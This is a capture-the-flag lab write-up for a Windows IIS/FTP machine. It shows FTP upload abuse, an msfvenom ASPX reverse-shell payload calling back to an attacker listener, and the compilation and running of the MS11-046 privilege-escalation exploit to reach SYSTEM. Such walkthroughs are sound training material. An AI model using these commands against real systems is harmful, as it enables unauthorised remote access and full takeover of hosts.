MACHINE IP— 10.10.10.5
NMAP
nmap -sCV -p- -A 10.10.10.5 -vPORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03–18–17 02:06AM <DIR> aspnet_client
| 09–22–19 04:12AM 2842 devel.aspx
| 03–17–17 05:37PM 689 iisstart.htm
| 09–22–19 04:10AM 4 pw.html
|_03–17–17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Here we get to see that anonymous login is enabled at ftp server
after visiting ftp we can see that we are having permission to write on ftp sever
at ftp we got
NOTE :- shell1.aspx is my file (read below to know how & why)here we see that there are some files at ftp , now let’s see is this directory is shared on web?
let’s try calling welcome.png from http://10.10.10.5/welcome.png
BINGOO!!!!! ( ftp files are accessible from web)
so let’s make our reverse shell payload and call it from web
making payload using msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.7 LPORT=4444 -f aspx > shell1.aspx-p = for payload type
LHOST = listener ip
LPORT = listener port
-f = format
so we had created our shell1.apsx , let’s move forward with this and uploading it to ftp and before putting shell on ftp switch to binary and then upload the shell
ftp> put shell1.aspxcommand for putting file on ftp
as we had given LPORT 4444 in payload for reverse shell
start nc on port 4444 using
nc -lvp 4444now it’s time to call our shell1.apsx for getting shell
call { http://10.10.10.5/shell1.aspx } from your browser now we get shell at our nc
as we are just a iis user we are not having permission to visit on other users folders , here we have to do privilege escalation
used systeminfo command for the system information
here we got OS Version : 6.1.7600 n/a build 7600
let’s see if this version is vulnerable to privilege escalation
YUP!!! got the exploit at exploit db {EDB-ID: 40564}
but we can get this exploit directly from our linux system using
searchsploit -m 40564After looking in the exploit we get hints for compiling it
i686-w64-mingw32-gcc 40564.c -o MS11–046.exe -lws2_32and we got the compiled MS11–046.exe now the main work is to transfer it to windows pc for privilege escalation
remember we are having write permission to ftp again sending file with ftp
here we have to enable binary transfer at out ftp enter below command for enabling it
ftp> binary
200 Type set to I.
ftp> put MS11–046.exe
local: MS11–046.exe remote: MS11–046.exe
200 PORT command successful.we now move to c:\inetpub\wwwroot and there we got our MS11–046
now we just had to run
c:\inetpub\wwwroot>MS11–046.exe
MS11–046.exec:\Windows\System32>whoami
whoami
nt authority\system
now you are having administrator power and can visit to any users profile/directory
got root at C:\Users\Administrator\Desktop\root.txt.txt
type root.txt.txtgot user at C:\Users\babis\Desktop\user.txt.txt
type user.txt.txtCOWABUNGA !!!!!!!!
